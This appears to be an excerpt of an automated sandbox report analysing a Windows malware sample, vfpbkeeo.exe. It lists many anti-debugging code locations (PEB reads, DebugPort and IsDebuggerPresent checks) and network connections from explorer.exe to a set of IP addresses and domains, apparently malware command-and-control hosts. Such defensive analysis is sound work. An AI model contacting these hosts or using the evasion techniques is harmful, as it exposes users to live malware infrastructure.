Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h] 3_2_00A23884
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E90AF mov eax, dword ptr fs:[00000030h] 3_2_009E90AF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00A3B8D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB02A mov eax, dword ptr fs:[00000030h] 3_2_009BB02A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h] 3_2_00A74015
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A74015 mov eax, dword ptr fs:[00000030h] 3_2_00A74015
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27016 mov eax, dword ptr fs:[00000030h] 3_2_00A27016
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h] 3_2_009C0050
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C0050 mov eax, dword ptr fs:[00000030h] 3_2_009C0050
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A71074 mov eax, dword ptr fs:[00000030h] 3_2_00A71074
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A62073 mov eax, dword ptr fs:[00000030h] 3_2_00A62073
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DA185 mov eax, dword ptr fs:[00000030h] 3_2_009DA185
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC182 mov eax, dword ptr fs:[00000030h] 3_2_009CC182
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB1E1 mov eax, dword ptr fs:[00000030h] 3_2_009AB1E1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9100 mov eax, dword ptr fs:[00000030h] 3_2_009A9100
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D513A mov eax, dword ptr fs:[00000030h] 3_2_009D513A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D513A mov eax, dword ptr fs:[00000030h] 3_2_009D513A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 mov ecx, dword ptr fs:[00000030h] 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h] 3_2_009CB944
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h] 3_2_009CB944
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h] 3_2_009AB171
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h] 3_2_009AB171
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h] 3_2_009DD294
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h] 3_2_009DD294
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h] 3_2_009BAAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h] 3_2_009BAAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFAB0 mov eax, dword ptr fs:[00000030h] 3_2_009DFAB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h] 3_2_009A52A5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C3A1C mov eax, dword ptr fs:[00000030h] 3_2_009C3A1C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h] 3_2_00A5B260
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h] 3_2_00A5B260
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78A62 mov eax, dword ptr fs:[00000030h] 3_2_00A78A62
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h] 3_2_009A9240
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E927A mov eax, dword ptr fs:[00000030h] 3_2_009E927A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A75BA5 mov eax, dword ptr fs:[00000030h] 3_2_00A75BA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DB390 mov eax, dword ptr fs:[00000030h] 3_2_009DB390
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h] 3_2_009B1B8F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h] 3_2_009B1B8F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5D380 mov ecx, dword ptr fs:[00000030h] 3_2_00A5D380
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A6138A mov eax, dword ptr fs:[00000030h] 3_2_00A6138A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A6131B mov eax, dword ptr fs:[00000030h] 3_2_00A6131B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AF358 mov eax, dword ptr fs:[00000030h] 3_2_009AF358
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009ADB40 mov eax, dword ptr fs:[00000030h] 3_2_009ADB40
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h] 3_2_009D3B7A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h] 3_2_009D3B7A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009ADB60 mov ecx, dword ptr fs:[00000030h] 3_2_009ADB60
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78B58 mov eax, dword ptr fs:[00000030h] 3_2_00A78B58
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A26CF0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A614FB mov eax, dword ptr fs:[00000030h] 3_2_00A614FB
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78CD6 mov eax, dword ptr fs:[00000030h] 3_2_00A78CD6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h] 3_2_00A61C06
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h] 3_2_00A26C0A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h] 3_2_00A7740D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DBC2C mov eax, dword ptr fs:[00000030h] 3_2_009DBC2C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C746D mov eax, dword ptr fs:[00000030h] 3_2_009C746D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h] 3_2_00A3C450
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h] 3_2_00A3C450
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h] 3_2_009DFD9B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h] 3_2_009DFD9B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h] 3_2_009A2D8A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D35A1 mov eax, dword ptr fs:[00000030h] 3_2_009D35A1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A58DF1 mov eax, dword ptr fs:[00000030h] 3_2_00A58DF1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78D34 mov eax, dword ptr fs:[00000030h] 3_2_00A78D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A2A537 mov eax, dword ptr fs:[00000030h] 3_2_00A2A537
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h] 3_2_009D4D3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AAD30 mov eax, dword ptr fs:[00000030h] 3_2_009AAD30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h] 3_2_009B3D34
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C7D50 mov eax, dword ptr fs:[00000030h] 3_2_009C7D50
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E3D43 mov eax, dword ptr fs:[00000030h] 3_2_009E3D43
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23540 mov eax, dword ptr fs:[00000030h] 3_2_00A23540
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h] 3_2_009CC577
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h] 3_2_009CC577
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h] 3_2_00A70EA5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A246A7 mov eax, dword ptr fs:[00000030h] 3_2_00A246A7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FE87 mov eax, dword ptr fs:[00000030h] 3_2_00A3FE87
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D36CC mov eax, dword ptr fs:[00000030h] 3_2_009D36CC
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E8EC7 mov eax, dword ptr fs:[00000030h] 3_2_009E8EC7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5FEC0 mov eax, dword ptr fs:[00000030h] 3_2_00A5FEC0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78ED6 mov eax, dword ptr fs:[00000030h] 3_2_00A78ED6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B76E2 mov eax, dword ptr fs:[00000030h] 3_2_009B76E2
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D16E0 mov ecx, dword ptr fs:[00000030h] 3_2_009D16E0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A5FE3F mov eax, dword ptr fs:[00000030h] 3_2_00A5FE3F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h] 3_2_009AC600
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AE620 mov eax, dword ptr fs:[00000030h] 3_2_009AE620
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h] 3_2_009B7E41
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h] 3_2_009CAE73
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B766D mov eax, dword ptr fs:[00000030h] 3_2_009B766D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h] 3_2_00A27794
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h] 3_2_00A7070D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h] 3_2_00A7070D
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DE730 mov eax, dword ptr fs:[00000030h] 3_2_009DE730
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h] 3_2_009A4F2E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h] 3_2_009A4F2E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A78F6A mov eax, dword ptr fs:[00000030h] 3_2_00A78F6A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BEF40 mov eax, dword ptr fs:[00000030h] 3_2_009BEF40
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BFF60 mov eax, dword ptr fs:[00000030h] 3_2_009BFF60
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040CF93 LdrLoadDll, 3_2_0040CF93
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004018B6 SetUnhandledExceptionFilter, 1_2_004018B6
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040632B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00401BB3

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Network Connect: 45.33.30.197 80
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80
